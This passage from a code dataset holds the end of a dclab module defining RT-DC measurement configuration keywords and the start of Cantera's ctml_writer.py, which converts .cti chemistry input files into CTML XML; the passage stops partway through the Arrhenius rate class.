#: All configuration keywords editable by the user
CFG_ANALYSIS = {
# filtering parameters
"filtering": [
["hierarchy parent", str, "Hierarchy parent of the dataset"],
["remove invalid events", fbool, "Remove events with inf/nan values"],
["enable filters", fbool, "Enable filtering"],
["limit events", fint, "Upper limit for number of filtered events"],
["polygon filters", fintlist, "Polygon filter indices"],
],
# Additional user-defined data
"calculation": [
# "emodulus lut" was introduced in 0.32.0 and will replace
# the deprecated "emodulus model".
["emodulus lut", str, "Look-up table identifier"],
["emodulus model", lcstr, "Model [DEPRECATED]"],
["emodulus medium", str, "Medium used (e.g. CellCarrierB, water)"],
["emodulus temperature", float, "Chip temperature [°C]"],
["emodulus viscosity", float, "Viscosity [Pa*s] if 'medium' unknown"],
["crosstalk fl21", float, "Fluorescence crosstalk, channel 2 to 1"],
["crosstalk fl31", float, "Fluorescence crosstalk, channel 3 to 1"],
["crosstalk fl12", float, "Fluorescence crosstalk, channel 1 to 2"],
["crosstalk fl32", float, "Fluorescence crosstalk, channel 3 to 2"],
["crosstalk fl13", float, "Fluorescence crosstalk, channel 1 to 3"],
["crosstalk fl23", float, "Fluorescence crosstalk, channel 2 to 3"],
]
}
#: All read-only configuration keywords for a measurement
CFG_METADATA = {
# All parameters related to the actual experiment
"experiment": [
["date", str, "Date of measurement ('YYYY-MM-DD')"],
["event count", fint, "Number of recorded events"],
["run index", fint, "Index of measurement run"],
["sample", str, "Measured sample or user-defined reference"],
["time", str, "Start time of measurement ('HH:MM:SS[.S]')"],
],
# All special keywords related to RT-FDC
# This section should not be present for regular RT-DC measurements.
"fluorescence": [
# The baseline offset was introduced in 0.33.0. It is added to
# the trace data to obtain the actual signal used for data
# processing (e.g. obtaining the fl1_max feature). This is more
# robust than adding the offset directly to the trace data, because
# of the possibility of integer overflows. Furthermore, DCKit can
# set this parameter without modifying the original trace data
# to correct/remove negative trace data
# (see https://github.com/ZELLMECHANIK-DRESDEN/dclab/issues/101).
# Note that traces accessed from RTDCBase instances are never
# background-corrected!
["baseline 1 offset", fint, "Baseline offset channel 1"],
["baseline 2 offset", fint, "Baseline offset channel 2"],
["baseline 3 offset", fint, "Baseline offset channel 3"],
["bit depth", fint, "Trace bit depth"],
# If a fluorescence channel is used, a channel name *must* be
# present. If a channel is not used, the channel name *must not*
# be present. E.g. if only channels 1 and 2 are used, but there
# are three channels present, then `channel count` is two,
# `channels installed` is three, and `channel 3 name` is not set.
["channel 1 name", str, "FL1 description"],
["channel 2 name", str, "FL2 description"],
["channel 3 name", str, "FL3 description"],
["channel count", fint, "Number of active channels"],
["channels installed", fint, "Number of available channels"],
# In contrast to `channel ? name`, the laser power *may*
# be present (but must be set to 0), if a laser line is not used.
["laser 1 lambda", float, "Laser 1 wavelength [nm]"],
["laser 1 power", float, "Laser 1 output power [%]"],
["laser 2 lambda", float, "Laser 2 wavelength [nm]"],
["laser 2 power", float, "Laser 2 output power [%]"],
["laser 3 lambda", float, "Laser 3 wavelength [nm]"],
["laser 3 power", float, "Laser 3 output power [%]"],
["laser count", fint, "Number of active lasers"],
["lasers installed", fint, "Number of available lasers"],
["sample rate", fint, "Trace sample rate [Hz]"],
["samples per event", fint, "Samples per event"],
["signal max", float, "Upper voltage detection limit [V]"],
["signal min", float, "Lower voltage detection limit [V]"],
["trace median", fint, "Rolling median filter size for traces"],
],
# All tdms-related parameters
"fmt_tdms": [
["video frame offset", fint, "Missing events at beginning of video"],
],
# All imaging-related keywords
"imaging": [
["flash device", str, "Light source device type"], # e.g. green LED
["flash duration", float, "Light source flash duration [µs]"],
["frame rate", float, "Imaging frame rate [Hz]"],
["pixel size", float, "Pixel size [µm]"],
["roi position x", fint, "Image x coordinate on sensor [px]"],
["roi position y", fint, "Image y coordinate on sensor [px]"],
["roi size x", fint, "Image width [px]"],
["roi size y", fint, "Image height [px]"],
],
# All parameters for online contour extraction from the event images
"online_contour": [
# The option "bg empty" was introduced in dclab 0.34.0 and
# Shape-In 2.2.2.5.
# Shape-In writes to the "shapein-warning" log if there are
# frames with event images (non-empty frames) that had to be
# used for background correction.
["bg empty", fbool, "Background correction from empty frames only"],
["bin area min", fint, "Minium pixel area of binary image event"],
["bin kernel", fint, "Odd ellipse kernel size, binary image morphing"],
["bin threshold", fint, "Binary threshold for avg-bg-corrected image"],
["image blur", fint, "Odd sigma for Gaussian blur (21x21 kernel)"],
["no absdiff", fbool, "Avoid OpenCV 'absdiff' for avg-bg-correction"],
],
# All online-filter-related keywords (box filters, soft limit, and
# polygons are handled in `meta_logic`)
"online_filter": [
# "target*" is only set if measurement is stopped automatically.
# "target*" is not necessarily reached (e.g. user aborted).
["target duration", float, "Target measurement duration [min]"],
["target event count", fint, "Target event count for online gating"],
],
# All setup-related keywords, except imaging
"setup": [
["channel width", float, "Width of microfluidic channel [µm]"],
["chip identifier", lcstr, "Unique identifier of the chip used"],
["chip region", lcstr, "Imaged chip region (channel or reservoir)"],
["flow rate", float, "Flow rate in channel [µL/s]"],
["flow rate sample", float, "Sample flow rate [µL/s]"],
["flow rate sheath", float, "Sheath flow rate [µL/s]"],
["identifier", str, "Unique setup identifier"],
# "medium" is one of CellCarrier, CellCarrierB, water, or other
["medium", str, "Medium used"],
["module composition", str, "Comma-separated list of modules used"],
["software version", str, "Acquisition software with version"],
["temperature", float, "Mean chip temperature [°C]"],
],
}
# CFG convenience lists and dicts
_cfg = copy.deepcopy(CFG_METADATA)
_cfg.update(CFG_ANALYSIS)
#: dict with metadata description
config_descr = {}
for _key in _cfg:
config_descr[_key] = {}
for _subkey, __, _descr in _cfg[_key]:
config_descr[_key][_subkey] = _descr
#: dict of dicts containing functions to convert input data
config_funcs = {}
for _key in _cfg:
config_funcs[_key] = {}
for _subkey, _type, __ in _cfg[_key]:
config_funcs[_key][_subkey] = _type
#: dict with section as keys and config parameter names as values
config_keys = {}
for _key in _cfg:
config_keys[_key] = [it[0] for it in _cfg[_key]]
#: dict of dicts containing the type of section parameters
config_types = {}
for _key in _cfg:
config_types[_key] = {}
for _subkey, _type, __ in _cfg[_key]:
if _type in func_types:
_type = func_types[_type]
config_types[_key][_subkey] = _type
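# Illustrative usage sketch (not part of the original module):
#   config_descr["imaging"]["pixel size"]     -> "Pixel size [µm]"
#   config_keys["experiment"]                 -> ["date", "event count", ...]
#   config_funcs["experiment"]["event count"] -> fint (presumably parses "42" -> 42)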
| ZellMechanik-Dresden/dclab | dclab/definitions/meta_const.py | Python | gpl-2.0 | 8,424 | ["Gaussian"] | 2ee091a6608c1723682c4243c57c991e67ee5f36bbfbb033b9a55ebd5a8c0ff1 |
#!/usr/bin/env python
##
# @file ctml_writer.py
#
# Cantera .cti input file processor
# @defgroup pygroup Cantera Python Interface
#
# The functions and classes in this module process Cantera .cti input
# files and produce CTML files. It can be imported as a module, or used
# as a script.
#
# script usage:
#
# python ctml_writer.py infile.cti
#
# This will produce CTML file 'infile.xml'
from __future__ import print_function
import sys
def _printerr(*args):
# All debug and error output should go to stderr
print(*args, file=sys.stderr)
class CTI_Error(Exception):
"""Exception raised if an error is encountered while
parsing the input file.
@ingroup pygroup"""
def __init__(self, msg):
_printerr('\n\n***** Error parsing input file *****\n\n')
_printerr(msg)
_printerr()
indent = ['',
          ' ',
          '  ',
          '   ',
          '    ',
          '     ',
          '      ',
          '       ',
          '        ',
          '         ',
          '          ',
          '           ',
          '            ',
          '             ',
          '              ',
          '               ']
#-----------------------------------------------------
class XMLnode(object):
"""This is a minimal class to allow easy creation of an XML tree
from Python. It can write XML, but cannot read it."""
__slots__ = ('_name', '_value', '_attribs', '_children', '_childmap')
def __init__(self, name="--", value = ""):
"""Create a new node. Usually this only needs to be explicitly
called to create the root element. Method addChild calls this
constructor to create the new child node."""
self._name = name
# convert 'value' to a string if it is not already, and
# strip leading whitespace
if not isinstance(value, str):
self._value = repr(value).lstrip()
else:
self._value = value.lstrip()
self._attribs = {} # dictionary of attributes
self._children = [] # list of child nodes
self._childmap = {} # dictionary of child nodes
def name(self):
"""The tag name of the node."""
return self._name
def nChildren(self):
"""Number of child elements."""
return len(self._children)
def addChild(self, name, value=""):
"""Add a child with tag 'name', and set its value if the value
parameter is supplied."""
# create a new node for the child
c = XMLnode(name = name, value = value)
# add it to the list of children, and to the dictionary
# of children
self._children.append(c)
self._childmap[name] = c
return c
def addComment(self, comment):
"""Add a comment."""
self.addChild(name = '_comment_', value = comment)
def value(self):
"""A string containing the element value."""
return self._value
def child(self, name=""):
"""The child node with specified name."""
return self._childmap[name]
def children(self):
""" An iterator over the child nodes """
for c in self._children:
yield c
def __getitem__(self, key):
"""Get an attribute using the syntax node[key]"""
return self._attribs[key]
def __setitem__(self, key, value):
"""Set a new attribute using the syntax node[key] = value."""
self._attribs[key] = value
def __call__(self):
"""Allows getting the value using the syntax 'node()'"""
return self._value
def write(self, filename):
"""Write out the XML tree to a file."""
s = ['<?xml version="1.0"?>\n']
self._write(s, 0)
s.append('\n')
if isinstance(filename, str):
with open(filename, 'w') as f:
f.write(''.join(s))
else:
filename.write(''.join(s))
def write_comment(self, s, level):
s.append('\n'+indent[level]+'<!--')
value = self._value
if value:
if value[0] != ' ':
value = ' '+value
if value[-1] != ' ':
value += ' '
s.append(value+'-->')
def write_attribs(self, s):
for a in self._attribs:
s.append(' '+a+'="'+self._attribs[a]+'"')
def write_value(self, s, level):
indnt = indent[level]
vv = self._value.lstrip()
ieol = vv.find('\n')
if ieol >= 0:
while True:
ieol = vv.find('\n')
if ieol >= 0:
s.extend(('\n ', indnt, vv[:ieol]))
vv = vv[ieol+1:].lstrip()
else:
s.extend(('\n ',indnt,vv))
break
else:
s.append(self._value)
def _write(self, s, level = 0):
"""Internal method used to write the XML representation of each node."""
if not self._name:
return
# handle comments
if self._name == '_comment_':
self.write_comment(s, level)
return
indnt = indent[level]
# write the opening tag and attributes
s.extend((indnt, '<', self._name))
self.write_attribs(s)
if not self._value and not self._children:
s.append('/>')
else:
s.append('>')
if self._value:
self.write_value(s, level)
for c in self._children:
s.append('\n')
c._write(s, level + 2)
if self._children:
s.extend(('\n', indnt))
s.extend(('</', self._name, '>'))
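# Illustrative usage sketch for XMLnode (not part of the original file):
#   root = XMLnode('ctml')
#   phase = root.addChild('phase')
#   phase['id'] = 'gas'
#   root.write('example.xml')   # or root.write(sys.stdout)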
#--------------------------------------------------
# constants that can be used in .cti files
OneAtm = 1.01325e5
OneBar = 1.0e5
# Conversion from eV to J/kmol (electron charge * Avogadro constant)
eV = 9.64853364595687e7
# Electron Mass in kg
ElectronMass = 9.10938291e-31
import math, copy
# default units
_ulen = 'm'
_umol = 'kmol'
_umass = 'kg'
_utime = 's'
_ue = 'J/kmol'
_uenergy = 'J'
_upres = 'Pa'
# used to convert reaction pre-exponentials
_length = {'cm':0.01, 'm':1.0, 'mm':0.001}
_moles = {'kmol':1.0, 'mol':0.001, 'molec':1.0/6.02214129e26}
_time = {'s':1.0, 'min':60.0, 'hr':3600.0}
# default std state pressure
_pref = 1.0e5 # 1 bar
_name = 'noname'
# these lists store top-level entries
_elements = []
_species = []
_speciesnames = []
_phases = []
_reactions = []
_atw = {}
_enames = {}
_valsp = ''
_valrxn = ''
_valexport = ''
_valfmt = ''
def export_species(filename, fmt = 'CSV'):
global _valexport
global _valfmt
_valexport = filename
_valfmt = fmt
def validate(species = 'yes', reactions = 'yes'):
"""
Enable or disable validation of species and reactions.
:param species:
Set to ``'yes'`` (default) or ``'no'``.
:param reactions:
Set to ``'yes'`` (default) or ``'no'``. This controls duplicate reaction checks
and validation of rate expressions for some reaction types.
"""
global _valsp
global _valrxn
_valsp = species
_valrxn = reactions
def isnum(a):
"""True if a is an integer or floating-point number."""
if isinstance(a, (int, float)):
return 1
else:
return 0
def is_local_species(name):
"""true if the species named 'name' is defined in this file"""
if name in _speciesnames:
return 1
return 0
def dataset(nm):
"Set the dataset name. Invoke this to change the name of the XML file."
global _name
_name = nm
def standard_pressure(p0):
"""Set the default standard-state pressure."""
global _pref
_pref = p0
def units(length = '', quantity = '', mass = '', time = '',
act_energy = '', energy = '', pressure = ''):
"""
Set the default units.
:param length:
The default units for length. Default: ``'m'``
:param mass:
The default units for mass. Default: ``'kg'``
:param quantity:
The default units to specify number of molecules. Default: ``'kmol'``
:param time:
The default units for time. Default: ``'s'``
:param energy:
The default units for energies. Default: ``'J'``
:param act_energy:
The default units for activation energies. Default: ``'J/kmol'``
:param pressure:
The default units for pressure. Default: ``'Pa'``
"""
global _ulen, _umol, _ue, _utime, _umass, _uenergy, _upres
if length: _ulen = length
if quantity: _umol = quantity
if act_energy: _ue = act_energy
if time: _utime = time
if mass: _umass = mass
if energy: _uenergy = energy
if pressure: _upres = pressure
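# Illustrative call (not part of the original file), as might appear near the
# top of a .cti input file:
#   units(length='cm', quantity='mol', act_energy='kcal/mol')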
def ufmt(base, n):
"""return a string representing a unit to a power n."""
if n == 0: return ''
if n == 1: return '-'+base
if n == -1: return '/'+base
if n > 0: return '-'+base+str(n)
if n < 0: return '/'+base+str(-n)
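# Illustrative results (not part of the original file):
#   ufmt('m', 2)  -> '-m2'
#   ufmt('s', -1) -> '/s'
#   ufmt('kg', 0) -> ''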
def write(outName=None):
"""write the CTML file."""
x = XMLnode("ctml")
v = x.addChild("validate")
v["species"] = _valsp
v["reactions"] = _valrxn
if _elements:
ed = x.addChild("elementData")
for e in _elements:
e.build(ed)
for ph in _phases:
ph.build(x)
s = species_set(name = _name, species = _species)
s.build(x)
r = x.addChild('reactionData')
r['id'] = 'reaction_data'
for rx in _reactions:
rx.build(r)
if outName == 'STDOUT':
x.write(sys.stdout)
elif outName is not None:
x.write(outName)
elif _name != 'noname':
x.write(_name+'.xml')
else:
print(x)
if _valexport:
f = open(_valexport,'w')
for s in _species:
s.export(f, _valfmt)
f.close()
def addFloat(x, nm, val, fmt='', defunits=''):
"""
Add a child element to XML element x representing a
floating-point number.
"""
u = ''
s = ''
if isnum(val):
fval = float(val)
if fmt:
s = fmt % fval
else:
s = repr(fval)
xc = x.addChild(nm, s)
if defunits:
xc['units'] = defunits
else:
v = val[0]
u = val[1]
if fmt:
s = fmt % v
else:
s = repr(v)
xc = x.addChild(nm, s)
xc['units'] = u
def getAtomicComp(atoms):
if isinstance(atoms, dict): return atoms
a = atoms.replace(',',' ')
toks = a.split()
d = {}
for t in toks:
b = t.split(':')
try:
d[b[0]] = int(b[1])
except ValueError:
d[b[0]] = float(b[1])
return d
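# Illustrative results (not part of the original file):
#   getAtomicComp('C:1 H:4')    -> {'C': 1, 'H': 4}
#   getAtomicComp('H:1.5, O:1') -> {'H': 1.5, 'O': 1}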
def getReactionSpecies(s):
"""Take a reaction string and return a
dictionary mapping species names to stoichiometric
coefficients. If any species appears more than once,
the returned stoichiometric coefficient is the sum.
>>> s = 'CH3 + 3 H + 5.2 O2 + 0.7 H'
>>> getReactionSpecies(s)
{'CH3': 1.0, 'H': 3.7, 'O2': 5.2}
"""
# Normalize formatting of falloff third bodies so that there is always a
# space following the '+', e.g. '(+M)' -> '(+ M)'
s = s.replace(' (+', ' (+ ')
# get rid of the '+' signs separating species. Only plus signs
# surrounded by spaces are replaced, so that plus signs may be
# used in species names (e.g. 'Ar3+')
toks = s.replace(' + ',' ').split()
d = {}
n = 1.0
for t in toks:
# try to convert the token to a number.
try:
n = float(t)
if n < 0.0:
raise CTI_Error("negative stoichiometric coefficient:"
+s)
#if t > '0' and t < '9':
# n = int(t)
#else:
# token isn't a number, so it must be a species name
except:
# already seen this token so increment its value by the last
# value of n
if t in d:
d[t] += n
else:
# first time this token has been seen, so set its value to n
d[t] = n
# reset n to 1.0 for species that do not specify a stoichiometric
# coefficient
n = 1.0
return d
class element(object):
""" An atomic element or isotope. """
def __init__(self, symbol = '',
atomic_mass = 0.01,
atomic_number = 0):
"""
:param symbol:
The symbol for the element or isotope.
:param atomic_mass:
The atomic mass in amu.
"""
self._sym = symbol
self._atw = atomic_mass
self._num = atomic_number
global _elements
_elements.append(self)
def build(self, db):
e = db.addChild("element")
e["name"] = self._sym
e["atomicWt"] = repr(self._atw)
e["atomicNumber"] = repr(self._num)
class species_set(object):
def __init__(self, name = '', species = []):
self._s = species
self._name = name
#self.type = SPECIES_SET
def build(self, p):
p.addComment(' species definitions ')
sd = p.addChild("speciesData")
sd["id"] = "species_data"
for s in self._s:
#if s.type == SPECIES:
s.build(sd)
#else:
# raise 'wrong object type in species_set: '+s.__class__
class species(object):
"""A constituent of a phase or interface."""
def __init__(self,
name = 'missing name!',
atoms = '',
note = '',
thermo = None,
transport = None,
charge = -999,
size = 1.0):
"""
:param name:
The species name (or formula). The name may be arbitrarily long,
although usually a relatively short, abbreviated name is most
convenient. Required parameter.
:param atoms:
The atomic composition, specified by a string containing
space-delimited <element>:<atoms> pairs. The number of atoms may be
either an integer or a floating-point number.
:param note:
A user-defined comment. Not evaluated by Cantera itself.
:param thermo:
The parameterization to use to compute the reference-state
thermodynamic properties. This must be one of the entry types
described in :ref:`sec-thermo-models`. To specify multiple
parameterizations, each for a different temperature range,
group them in parentheses.
:param transport:
An entry specifying parameters to compute this species'
contribution to the transport properties. This must be one of the
entry types described in :ref:`sec-species-transport-models`, and
must be consistent with the transport model of the phase into which
the species is imported. To specify parameters for multiple
transport models, group the entries in parentheses.
:param size:
The species "size". Currently used only for surface species,
where it represents the number of sites occupied.
:param charge:
The charge, in multiples of :math:`|e|`. If not specified, the
charge will be calculated from the number of "atoms" of element
``E``, which represents an electron.
"""
self._name = name
self._atoms = getAtomicComp(atoms)
self._comment = note
if thermo:
self._thermo = thermo
else:
self._thermo = const_cp()
self._transport = transport
chrg = 0
self._charge = charge
if 'E' in self._atoms:
chrg = -self._atoms['E']
if self._charge != -999:
if self._charge != chrg:
raise CTI_Error('specified charge inconsistent with number of electrons')
else:
self._charge = chrg
self._size = size
global _species
global _enames
_species.append(self)
global _speciesnames
if name in _speciesnames:
raise CTI_Error('species '+name+' multiply defined.')
_speciesnames.append(name)
for e in self._atoms.keys():
_enames[e] = 1
def export(self, f, fmt = 'CSV'):
global _enames
if fmt == 'CSV':
s = self._name+','
for e in _enames:
if e in self._atoms:
s += repr(self._atoms[e])+','
else:
s += '0,'
f.write(s)
if isinstance(self._thermo, thermo):
self._thermo.export(f, fmt)
else:
nt = len(self._thermo)
for n in range(nt):
self._thermo[n].export(f, fmt)
f.write('\n')
def build(self, p):
hdr = ' species '+self._name+' '
p.addComment(hdr)
s = p.addChild("species")
s["name"] = self._name
a = ''
for e in self._atoms.keys():
a += e+':'+str(self._atoms[e])+' '
s.addChild("atomArray",a)
if self._comment:
s.addChild("note",self._comment)
if self._charge != -999:
s.addChild("charge",self._charge)
if self._size != 1.0:
s.addChild("size",self._size)
if self._thermo:
t = s.addChild("thermo")
if isinstance(self._thermo, thermo):
self._thermo.build(t)
else:
nt = len(self._thermo)
for n in range(nt):
self._thermo[n].build(t)
if self._transport:
t = s.addChild("transport")
if isinstance(self._transport, transport):
self._transport.build(t)
else:
nt = len(self._transport)
for n in range(nt):
self._transport[n].build(t)
class thermo(object):
"""Base class for species standard-state thermodynamic properties."""
def _build(self, p):
return p.addChild("thermo")
def export(self, f, fmt = 'CSV'):
pass
class Mu0_table(thermo):
"""Properties are computed by specifying a table of standard
chemical potentials vs. T."""
def __init__(self, Trange = (0.0, 0.0),
h298 = 0.0,
mu0 = None,
p0 = -1.0):
self._t = Trange
self._h298 = h298
self._mu0 = mu0
self._pref = p0
def build(self, t):
n = t.addChild("Mu0")
n['Tmin'] = repr(self._t[0])
n['Tmax'] = repr(self._t[1])
if self._pref <= 0.0:
n['P0'] = repr(_pref)
else:
n['P0'] = repr(self._pref)
energy_units = _uenergy+'/'+_umol
addFloat(n,"H298", self._h298, defunits = energy_units)
n.addChild("numPoints", len(self._mu0))
mustr = ''
tstr = ''
col = 0
for v in self._mu0:
mu0 = v[1]
t = v[0]
tstr += '%17.9E, ' % t
mustr += '%17.9E, ' % mu0
col += 1
if col == 3:
tstr = tstr[:-2]+'\n'
mustr = mustr[:-2]+'\n'
col = 0
u = n.addChild("floatArray", mustr)
u["size"] = "numPoints"
u["name"] = "Mu0Values"
u = n.addChild("floatArray", tstr)
u["size"] = "numPoints"
u["name"] = "Mu0Temperatures"
class NASA(thermo):
"""The 7-coefficient NASA polynomial parameterization."""
def __init__(self, Trange = (0.0, 0.0), coeffs = [], p0 = -1.0):
r"""
:param Trange:
The temperature range over which the parameterization is valid.
This must be entered as a sequence of two temperature values.
Required.
:param coeffs:
List of seven coefficients :math:`(a_0, \ldots , a_6)`
:param p0:
The reference-state pressure, usually 1 atm or 1 bar. If omitted,
the default value is used, which is set by the ``standard_pressure``
directive.
"""
self._t = Trange
self._pref = p0
if len(coeffs) != 7:
raise CTI_Error('NASA coefficient list must have length = 7')
self._coeffs = coeffs
def export(self, f, fmt='CSV'):
if fmt == 'CSV':
s = 'NASA,'+str(self._t[0])+','+str(self._t[1])+','
for i in range(7):
s += '%17.9E, ' % self._coeffs[i]
f.write(s)
def build(self, t):
n = t.addChild("NASA")
n['Tmin'] = repr(self._t[0])
#n['Tmid'] = repr(self._t[1])
n['Tmax'] = repr(self._t[1])
if self._pref <= 0.0:
n['P0'] = repr(_pref)
else:
n['P0'] = repr(self._pref)
s = ''
for i in range(4):
s += '%17.9E, ' % self._coeffs[i]
s += '\n'
s += '%17.9E, %17.9E, %17.9E' % (self._coeffs[4],
self._coeffs[5], self._coeffs[6])
#if i > 0 and 3*((i+1)/3) == i: s += '\n'
#s = s[:-2]
u = n.addChild("floatArray", s)
u["size"] = "7"
u["name"] = "coeffs"
class NASA9(thermo):
"""NASA9 polynomial parameterization for a single temperature region."""
def __init__(self, Trange = (0.0, 0.0),
coeffs = [], p0 = -1.0):
r"""
:param Trange:
The temperature range over which the parameterization is valid.
This must be entered as a sequence of two temperature values.
Required.
:param coeffs:
List of nine coefficients :math:`(a_0, \ldots , a_8)`
:param p0:
The reference-state pressure, usually 1 atm or 1 bar. If omitted,
the default value is used, which is set by the ``standard_pressure``
directive.
"""
self._t = Trange # Range of the polynomial representation
self._pref = p0 # Reference pressure
if len(coeffs) != 9:
raise CTI_Error('NASA9 coefficient list must have length = 9')
self._coeffs = coeffs
def export(self, f, fmt='CSV'):
if fmt == 'CSV':
s = 'NASA9,'+str(self._t[0])+','+str(self._t[1])+','
for i in range(9):
s += '%17.9E, ' % self._coeffs[i]
f.write(s)
def build(self, t):
n = t.addChild("NASA9")
n['Tmin'] = repr(self._t[0])
n['Tmax'] = repr(self._t[1])
if self._pref <= 0.0:
n['P0'] = repr(_pref)
else:
n['P0'] = repr(self._pref)
s = ''
for i in range(4):
s += '%17.9E, ' % self._coeffs[i]
s += '\n'
s += '%17.9E, %17.9E, %17.9E, %17.9E,' % (self._coeffs[4], self._coeffs[5],
self._coeffs[6], self._coeffs[7])
s += '\n'
s += '%17.9E' % (self._coeffs[8])
u = n.addChild("floatArray", s)
u["size"] = "9"
u["name"] = "coeffs"
class activityCoefficients(object):
pass
class pureFluidParameters(activityCoefficients):
"""
"""
def __init__(self, species = None, a_coeff = [], b_coeff = 0):
"""
"""
self._species = species
self._acoeff = a_coeff
self._bcoeff = b_coeff
def build(self,a):
f= a.addChild("pureFluidParameters")
f['species'] = self._species
s = '%10.4E, %10.4E \n' % (self._acoeff[0], self._acoeff[1])
ac = f.addChild("a_coeff",s)
ac["units"] = _upres+'-'+_ulen+'6/'+_umol+'2'
ac["model"] = "linear_a"
s = '%0.2f \n' % self._bcoeff
bc = f.addChild("b_coeff",s)
bc["units"] = _ulen+'3/'+_umol
class crossFluidParameters(activityCoefficients):
def __init__(self, species = None, a_coeff = [], b_coeff = []):
self._species1, self._species2 = species.split(' ')
self._acoeff = a_coeff
self._bcoeff = b_coeff
def build(self,a):
f= a.addChild("crossFluidParameters")
f["species2"] = self._species2
f["species1"] = self._species1
s = '%10.4E, %10.4E \n' % (self._acoeff[0], self._acoeff[1])
ac = f.addChild("a_coeff",s)
ac["units"] = _upres+'-'+_ulen+'6/'+_umol+'2'
ac["model"] = "linear_a"
if self._bcoeff:
s = '%0.2f \n' % self._bcoeff
bc = f.addChild("b_coeff",s)
bc["units"] = _ulen+'3/'+_umol
class Shomate(thermo):
"""Shomate polynomial parameterization."""
def __init__(self, Trange = (0.0, 0.0), coeffs = [], p0 = -1.0):
r"""
:param Trange:
The temperature range over which the parameterization is valid.
This must be entered as a sequence of two temperature values.
Required input.
:param coeffs:
Sequence of seven coefficients :math:`(A, \ldots ,G)`
:param p0:
The reference-state pressure, usually 1 atm or 1 bar. If omitted,
the default value set by the ``standard_pressure`` directive is used.
"""
self._t = Trange
self._pref = p0
if len(coeffs) != 7:
raise CTI_Error('Shomate coefficient list must have length = 7')
self._coeffs = coeffs
def build(self, t):
n = t.addChild("Shomate")
n['Tmin'] = repr(self._t[0])
n['Tmax'] = repr(self._t[1])
if self._pref <= 0.0:
n['P0'] = repr(_pref)
else:
n['P0'] = repr(self._pref)
s = ''
for i in range(4):
s += '%17.9E, ' % self._coeffs[i]
s += '\n'
s += '%17.9E, %17.9E, %17.9E' % (self._coeffs[4],
self._coeffs[5], self._coeffs[6])
u = n.addChild("floatArray", s)
u["size"] = "7"
u["name"] = "coeffs"
class Adsorbate(thermo):
"""Adsorbed species characterized by a binding energy and a set of
vibrational frequencies."""
def __init__(self, Trange = (0.0, 0.0),
binding_energy = 0.0,
frequencies = [], p0 = -1.0):
self._t = Trange
self._pref = p0
self._freqs = frequencies
self._be = binding_energy
def build(self, t):
n = t.addChild("adsorbate")
n['Tmin'] = repr(self._t[0])
n['Tmax'] = repr(self._t[1])
if self._pref <= 0.0:
n['P0'] = repr(_pref)
else:
n['P0'] = repr(self._pref)
energy_units = _uenergy+'/'+_umol
addFloat(n,'binding_energy',self._be, defunits = energy_units)
s = ""
nfreq = len(self._freqs)
for i in range(nfreq):
s += '%17.9E, ' % self._freqs[i]
s += '\n'
u = n.addChild("floatArray", s)
u["size"] = repr(nfreq)
u["name"] = "freqs"
class const_cp(thermo):
"""Constant specific heat."""
def __init__(self,
t0 = 298.15, cp0 = 0.0, h0 = 0.0, s0 = 0.0,
tmax = 5000.0, tmin = 100.0):
"""
:param t0:
Temperature parameter T0. Default: 298.15 K.
:param cp0:
Reference-state molar heat capacity (constant). Default: 0.0.
:param h0:
Reference-state molar enthalpy at temperature T0. Default: 0.0.
:param s0:
Reference-state molar entropy at temperature T0. Default: 0.0.
"""
self._t = [tmin, tmax]
self._c = [t0, h0, s0, cp0]
def build(self, t):
#t = self._build(p)
c = t.addChild('const_cp')
if self._t[0] >= 0.0: c['Tmin'] = repr(self._t[0])
if self._t[1] >= 0.0: c['Tmax'] = repr(self._t[1])
energy_units = _uenergy+'/'+_umol
addFloat(c,'t0',self._c[0], defunits = 'K')
addFloat(c,'h0',self._c[1], defunits = energy_units)
addFloat(c,'s0',self._c[2], defunits = energy_units+'/K')
addFloat(c,'cp0',self._c[3], defunits = energy_units+'/K')
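# A short construction sketch for a constant-cp thermo entry; the numeric values
# and unit strings are illustrative assumptions, and the helper name is hypothetical.
def _example_const_cp():
    return const_cp(t0=298.15,
                    h0=(-20.0, 'kJ/mol'),
                    s0=(130.0, 'J/mol/K'),
                    cp0=(30.0, 'J/mol/K'))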
class transport(object):
pass
class gas_transport(transport):
"""
Species-specific Transport coefficients for gas-phase transport models.
"""
def __init__(self, geom,
diam = 0.0, well_depth = 0.0, dipole = 0.0,
polar = 0.0, rot_relax = 0.0, acentric_factor = None):
"""
:param geom:
A string specifying the molecular geometry. One of ``atom``,
``linear``, or ``nonlinear``. Required.
:param diam:
The Lennard-Jones collision diameter in Angstroms. Required.
:param well_depth:
The Lennard-Jones well depth in Kelvin. Required.
:param dipole:
The permanent dipole moment in Debye. Default: 0.0
:param polar:
The polarizability in A^3. Default: 0.0
:param rot_relax:
The rotational relaxation collision number at 298 K. Dimensionless.
Default: 0.0
:param acentric_factor:
Pitzer's acentric factor. Dimensionless. Optional; if omitted, no
acentric factor is written to the output.
"""
self._geom = geom
self._diam = diam
self._well_depth = well_depth
self._dipole = dipole
self._polar = polar
self._rot_relax = rot_relax
self._w_ac = acentric_factor
def build(self, t):
#t = s.addChild("transport")
t['model'] = 'gas_transport'
# t.addChild("geometry", self._geom)
tg = t.addChild('string',self._geom)
tg['title'] = 'geometry'
addFloat(t, "LJ_welldepth", (self._well_depth, 'K'), '%8.3f')
addFloat(t, "LJ_diameter", (self._diam, 'A'),'%8.3f')
addFloat(t, "dipoleMoment", (self._dipole, 'Debye'),'%8.3f')
addFloat(t, "polarizability", (self._polar, 'A3'),'%8.3f')
addFloat(t, "rotRelax", self._rot_relax,'%8.3f')
if self._w_ac is not None:
addFloat(t, "acentric_factor", self._w_ac, '%8.3f')
class rate_expression(object):
pass
class Arrhenius(rate_expression):
def __init__(self,
A = 0.0,
b = 0.0,
E = 0.0,
coverage = []):
"""
:param A:
The pre-exponential coefficient. Required input. If entered without
units, the units will be computed considering all factors that
affect the units. The resulting units string is written to the CTML
file individually for each reaction pre-exponential coefficient.
:param b:
The temperature exponent. Dimensionless. Default: 0.0.
:param E:
Activation energy. Default: 0.0.
:param coverage: For a single coverage dependency, a list with four
elements: the species name followed by the three coverage
parameters. For multiple coverage dependencies, a list of lists
containing the individual sets of coverage parameters. Only used for
surface and edge reactions.
"""
self._c = [A, b, E]
if coverage:
if isinstance(coverage[0], str):
self._cov = [coverage]
else:
self._cov = coverage
for cov in self._cov:
if len(cov) != 4:
raise CTI_Error("Incorrect number of coverage parameters")
else:
self._cov = None
def build(self, p, name='', a=None):
if a is None:
a = p.addChild('Arrhenius')
if name:
a['name'] = name
# if a pure number is entered for A, multiply by the conversion
# factor to SI and write it to CTML as a pure number. Otherwise,
# pass it as-is through to CTML with the unit string.
if isnum(self._c[0]):
